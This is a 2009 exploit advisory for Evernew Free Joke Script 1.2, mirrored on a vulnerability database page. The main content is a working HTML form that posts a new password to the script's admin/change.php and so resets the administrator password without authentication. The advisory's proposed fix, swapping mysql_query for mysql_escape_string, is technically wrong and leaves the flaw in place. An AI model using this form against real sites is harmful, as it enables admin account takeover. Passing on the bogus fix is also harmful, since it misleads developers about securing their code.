Lucene search
K

Evernew Free Joke Script 1.2 Password Changer

🗓️ 15 Jun 2009 00:00:00Reported by HakxerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Evernew Free Joke Script 1.2 Password Changer vulnerability discovered and exploited by Hakxe

Code
`<!--  
Discovered & Exploited by : Hakxer  
Evernew Free Joke Script 1.2 => Remote Change Password  
  
[=>] Bug detail  
bug in change.php file  
in line 10 :  
$result=mysql_query("update admin set password='$pass'");  
-----------------------  
  
[=>] Fix  
$result=mysql_escape_string("update admin set password='$pass'");  
change mysql_query to mysql_escape_string  
  
[=>] Greetz : ExH , ProViDoR , Error code , dody2100 , sinaritx , all my friends  
!-->  
<form action="http://www.site.com/script/admin/change.php" method="post" name="form1" id="form1" onSubmit="MM_validateForm('password','','R');return document.MM_returnValue">  
<font class="text"><b>enter password to change it in admin :D</b></font> <br />  
<br/>  
<table width="305" height="106" border="0" cellpadding="5" cellspacing="0">  
<tr>  
<td width="103" class="text">Password : </td>  
<td width="182"><div align="left">  
<input name="password" type="password" class="style7" id="password" />  
</div></td>  
</tr>  
<tr>  
<td colspan="2"><div align="center">  
<input name="Submit" type="submit" class="text_1" value="Change Password" />  
</div></td>  
</tr>  
<tr>  
<td colspan="2"><?php echo($msg); ?> </td>  
</tr>  
</table>  
</form>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jun 2009 00:00Current
0.5Low risk
Vulners AI Score0.5
21